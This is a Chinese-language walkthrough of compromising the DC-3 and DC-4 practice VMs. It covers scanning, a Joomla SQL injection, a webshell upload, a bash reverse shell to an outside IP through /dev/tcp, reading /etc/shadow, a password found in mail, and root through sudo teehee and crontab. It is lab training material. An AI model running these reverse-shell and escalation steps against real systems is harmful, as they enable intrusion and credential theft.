DC系列靶机渗透测试 DC（3和4）

1. 扫描发现 目标没有分配到IP地址
   .Arp-scan -l
   
   2.重启靶机
   (1)按e
   
   Ctrl +x 进入单用户模式：
   
   进入编辑 /etc/network/interfaces
   
   
   3.确认靶机IP
   
   4.端口扫描，服务扫描
   Nmap -sS -sC -p- -O -T3 -sV ip
   
   只开了一个80端口， 使用Joomla CMS
   先访问80端口
   
   Joomla 寻找漏洞
   Kali下 搜索 searchsploit joomla
   
   发现一个sql注入的php 文件，因此需要构建一个php执行环境。
   将php放到之前的dvwa中
   
   利用nc传文件到XP 网站根目录：
   Nc -lp 8888 >
   
   Kali 上 nc 192.168.2.24 8888 < 44893.php
   
   
   然后访问a.php 让服务器解析php，运行程序。
   注出用户直接登录，寻找上传点
   
   上传文件，
   
   测试成功 。
   
   使用蚁剑连接
   在kali 上监听 反弹shell 在菜刀内使用
   Bash -c ‘sh -i &>/dev/tcp/192.168.2.20/8000 0>&1’
   
   可以看到已经反弹到了shell
   接下来就是提权操作了
   
   ubuntu版本为 16.04找版本漏洞
   
   将文本放到apache目录下
   
   搭建http 服务 然后 wget
   
   

DC-4靶机：
1.扫描

2.服务扫描

访问 网站

直接搜索nginx 1.15.10 版本漏洞
没有，因此考虑思路问题。这个靶机不同于前面三个，扫描后台根本没有什么东西。
也没有CMS可以利用，只有一个登录框；尝试爆破。
使用Burp（爆破也要分技巧性爆破） 字典类型合不合适，是否足够大。
常见弱口令爆破。Admin/root


用户名为admin,密码为 happy.

期望我们只能点这三个 查看文件，磁盘使用情况，内存使用情况。
猜测存在 文件包含漏洞。

因此存在任意命令执行漏洞。
查看当前路径


执行命令：
Cat /etc/shadow 没回显 说明拒绝访问
Whoami www-data
Cat /etc/shadow 发现了 root,jim,sam用户可以登录。（尝试ssh)
Uname -a



写一句话木马：发现文件并没有真的写进入。
尝试反弹shell



已经拿到shell，接下来就是提权。
尝试find suid提权，没用。
继续寻找信息，
进入jim 用户发现一个backups目录，有一个备份密码文件，尝试爆破jim密码

然后登录jim

在jim 家目录下发现有邮件

切到/var/mail 查看

发现 charles 给jim发了一封邮件，它的密码是 ^xHhA&hvim0y
切到charles 用户


切到home 发现还有sam 用户，
Sudo -l 发现使用 teehee 可以不用输入root密码.

利用crontab 提权


拿到root 。